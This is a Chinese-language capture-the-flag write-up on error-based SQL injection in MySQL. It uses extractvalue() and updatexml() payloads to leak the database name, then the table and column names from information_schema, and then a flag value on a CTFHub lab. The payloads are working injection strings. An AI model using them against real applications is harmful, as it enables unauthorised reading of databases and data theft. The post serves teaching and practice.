赞
踩
当输入语句出现错误时,会将相应错误输出到前端。SQL报错注入是基于这个条件进行。
常用报错函数:updatexml(),extractvalue(),floor(),exp()
extractvalue(xml_str,Xpath),是从xml中查询Xpath格式的字符串,并返回结果
但是,Xpath不能是结合~或#的字符串,否则会报错,报错会将整个错误的整个字符串都回显出来,因此可以利用报错回显找到想要的信息(xml_str可以随意填写),比如,ctfhub这题CTFHub
输入:
1 and extractvalue(1,concat(0x7e,database()))#
得到当前所属数据库为sqli
再查找当前数据库中包含的表格:
1 and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='sqli')))#
得到结果
可知sqli数据库中,除了表news,还有表flag,
查找表中字段:
1 and extractvalue(2,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='flag')))#
得到:
可知表格flag中只有字段flag
于是输入:
1 and extractvalue(1,concat(0x7e,(select flag from flag)))#
得到结果:
要注意的是,xpath回显上限32位
对于updatexml()函数,其格式是updatexml(xml,Xpath,news),是查找并替换xml文档中Xpath格式的字符串为news格式,其中Xpath的利用与extractvalue类似,因此注入方法只是多了一个可以内容随意的news的输入,例如对于以上题目,输入:
1 and updatexml(1,concat(0x7e,(select flag from flag)),1)#
就能得到结果:
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。